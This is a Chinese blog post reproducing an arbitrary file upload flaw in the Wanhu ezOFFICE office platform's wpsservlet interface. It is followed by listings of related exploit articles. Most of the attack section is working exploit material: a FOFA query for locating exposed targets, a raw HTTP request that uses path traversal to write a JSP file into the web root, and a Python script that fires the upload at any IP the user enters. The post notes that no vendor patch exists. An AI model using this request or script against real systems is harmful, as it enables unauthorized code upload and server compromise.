万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞

已于 2023-12-08 17:20:15 修改
阅读量676 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全 漏洞复现 万户 网络安全
于 2023-12-07 16:19:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/134857806

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台,平台ezoffice wpsservlet接口存在任意文件上传漏洞。

二、fofa语法

app="万户网络-ezOFFICE"

三、漏洞复现

poc

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cache-Control: max-age=0
Content-Length: 176
Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb

--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"

<% out.print("797276100");%>
--55aeb894de1521afe560c924fad7c6fb--

拼接上传地址:http://xxxxxx/defaultroot/platform/portal/layout/40067.jsp

被拦截了

四、poc.py

import requests

def verify(ip):

    url = f'{ip}/defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Cache - Control': 'max - age = 0',
        'Content - Length': '176',
        'Content-Type': 'multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb'
    }

    payload = '''
    --55aeb894de1521afe560c924fad7c6fb
    Content-Disposition: form-data; name="NewFile"; filename="40067.jsp"
    
    <% out.print("success");%>
    --55aeb894de1521afe560c924fad7c6fb--
    '''

    try:
        response = requests.post(url, headers=headers, data=payload)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞!!!")
    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

五.整改意见

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: http://www.whir.net

万户 OA OfficeServer.jsp 任意文件上传漏洞复现
0xSec
12-16 1698
万户OA OfficeServer.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞复现
iSee857的博客
09-28 992
万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞,通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞上传任意可执行性文件用于远程系统执行、数据获取、系统接管等,严重威胁系统的安全性。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。Fofa:app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"上传成功后拼接下列接口进行访问。
漏洞复现--万户ezoffice wpsservlet任意文件上传
qq_53003652的博客
12-05 1297
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。此系统wpsservlet存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。访问/defaultroot/platform/portal/layout/check.jsp。万户ezoffice
万户ezOFFICE wpsservlet任意文件上传漏洞复现
0xSec
11-30 1538
万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。 ​
万户 ezOFFICE协同管理平台 getAutoCode SQL注入漏洞复现(XVE-2024-18749)
0xSec
08-01 1014
万户 ezOFFICEgetAutoCode.jsp 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
漏洞复现万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞 附POC
失心少年
12-05 1101
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!拼接上传地址:http://127.0.0.1/defaultroot/platform/portal/layout/40067.jsp。漏洞链接:http://127.0.0.1/defaultroot/platform/portal/layout/45441.jsp。
漏洞复现万户OA-wpsservlet-任意文件上传
知黑而守白
01-19 309
万户OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA wpsservlet 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
万户OA-wpsservlet-任意文件上传
weixin_43567873的博客
03-04 222
万户OA-wpsservlet-任意文件上传漏洞
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 2349
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=万户ezOFFICE协同管理平台万户ezEIP。
万户协同办公平台ezoffice SignatureEditFrm.jsp SQL注入漏洞复现及POC
最新发布
mashiro_hibiki的博客
10-31 203
关注CatalyzeSec公众号获取更多。
万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
nnn2188185的博客
11-29 564
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
万户协同办公平台未授权访问漏洞复现
08-24 1108
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。
复现万户ezoffice协同管理平台 SQL注入漏洞_26
fushuang333的博客
01-23 1078
复现万户ezoffice协同管理平台 SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现万户协同办公平台ezoffice text2Html)接口存在任意文件读取漏洞
李火火的安全圈
10-28 318
万户ezOFFICE协同管理平台是一个综合信息基础应用平台万户协同办公平台ezoffice text2Html接口存在任意文件读取漏洞
万户协同办公平台ezoffice未授权访问漏洞
薛定谔嘚喵博客
08-31 525
万户ezOFFICE协同管理平台是一个综合信息基础应用平台万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
【1day】致远OA漏洞wpsAssistServlet接口任意文件上传漏洞学习
记录并分享学习安全的知识点..
08-11 1945
2022护网新爆出的致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
万户ezoffice wpsservlet任意文件上传漏洞
weixin_62352348的博客
01-29 445
万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限
万户 ezOFFICE 文件上传漏洞复现
0xSec
12-10 1358
万户 ezOFFICE 协同管理平台 senddocument_import.jsp、OfficeServer.jsp等接口处存在鉴权绕过并且可以上传任意文件,攻击者可上传恶意木马获取服务器权限。
2024HW漏洞总结500+个漏洞|威胁情报第|HW情报
weixin_43167326的博客
09-02 4537
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,或者是没有对用户上传的文件进行正确的校验和过滤操作。 想要复现这个漏洞,可以按照以下步骤进行: 1. 准备一个万户ezoffice的测试环境,包括安装相关软件和配置服务器环境。 2. 创建一个测试账号,并登录到系统中。 3. 在系统中找到文件上传的功能,并尝试上传一个文件。可以选择一个存在恶意代码的文件,例如一个带有JavaScript注入的HTML文件。 4. 观察系统的反应。如果文件上传成功,并且系统没有对文件进行正确的处理和过滤,那么就证明存在文件上传漏洞。 5. 尝试利用漏洞进行攻击,可以尝试上传一个病毒文件,或者注入一段恶意代码到服务器中。 6. 观察系统的反应和功能是否受到影响,以及漏洞的程度和影响范围。 在复现漏洞后,可以通过以下方法来修复和防止这个漏洞: 1. 对用户上传的文件进行严格的校验和过滤,确保只有合法的文件和内容能够被上传和处理。 2. 对文件内容进行安全扫描和检测,以防止上传病毒文件或者含有恶意代码的文件。 3. 在文件上传的功能上添加访问控制和权限验证,确保只有经过认证的用户才能进行文件上传操作。 4. 定期对系统进行安全审计和漏洞扫描,及时发现和修复潜在的安全问题。 5. 提高开发人员的安全意识和安全知识,确保在软件开发和设计中充分考虑安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值